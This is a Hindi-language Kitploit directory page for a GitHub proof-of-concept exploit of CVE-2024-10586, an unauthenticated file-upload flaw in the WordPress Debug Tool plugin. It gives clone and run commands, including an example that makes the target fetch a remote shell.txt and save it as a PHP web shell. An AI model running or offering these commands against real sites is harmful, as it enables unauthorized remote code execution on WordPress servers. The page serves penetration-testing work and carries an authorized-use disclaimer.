Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10586-Poc — WordPress Debug Tool प्लगइन को लक्षित करने वाले CVE-2024-10586 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। बिना प्रमाणीकरण के POST अनुरोधों के माध्यम से रिमोट कोड निष्पादन की ओर ले जाने वाले मनमाने फ़ाइल अपलोड को स्वचालित करता है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-10586-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-10586-poc

CVE-2024-10586-Poc

WordPress Debug Tool प्लगइन को लक्षित करने वाले CVE-2024-10586 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। बिना प्रमाणीकरण के POST अनुरोधों के माध्यम से रिमोट कोड निष्पादन की ओर ले जाने वाले मनमाने फ़ाइल अपलोड को स्वचालित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
101 साल पहलेअभी तक समीक्षित नहीं
साझा करें

भेद्यता जानकारी

विवरण वर्डप्रेस के लिए डिबग टूल प्लगइन विभिन्न संस्करणों में, 2.2 तक (सम्मिलित), dbt_pull_image() फ़ंक्शन पर क्षमता जाँच की कमी और फ़ाइल प्रकार सत्यापन की कमी के कारण मनमानी फ़ाइल निर्माण के प्रति संवेदनशील है।
यह बिना प्रमाणीकरण वाले हमलावरों को .php जैसी मनमानी फ़ाइलें बनाने में सक्षम बनाता है, जिनका उपयोग रिमोट कोड निष्पादन के लिए किया जा सकता है।

CVE आईडी

CVE-2024-10586

स्क्रिप्ट उपयोग

पूर्वापेक्षाएँ

  • आपके सिस्टम पर Python 3.x स्थापित हो।
  • आवश्यक निर्भरताएँ स्थापित करें: pip install requests

चलाने का तरीका

  1. GitHub से रिपॉजिटरी क्लोन करें:
root@kitploit:~
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
  • निम्न कमांड के साथ स्क्रिप्ट चलाएँ: python CVE-2024-10586.py -u -r -p

    पैरामीटर

    • -u, --url: वर्डप्रेस साइट का आधार URL (जैसे, http://example.com/wordpress)।
    • -r, --remote: पेलोड स्रोत के रूप में उपयोग की जाने वाली रिमोट फ़ाइल का URL।
    • -p, --path: वैकल्पिक। वह पथ जहाँ शेल सहेजा जाएगा। डिफ़ॉल्ट /opt/lampp/htdocs/wordpress/wp-content/Nxploit.php है।

    उदाहरण कमांड

    root@kitploit:~
    python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
    

    उदाहरण उपयोग

    root@kitploit:~
    python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
    
    usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
    
    Send a POST request to WordPress admin-ajax.php.
    
    options:
      -h, --help            show this help message and exit
      -u URL, --url URL     The base URL of the WordPress site.
      -r REMOTE, --remote REMOTE
                            The remote URL to use in the 'source' parameter.
      -p PATH, --path PATH  The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
    

    अस्वीकरण

    यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। लेखक इस टूल के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

    टूल डाउनलोड करें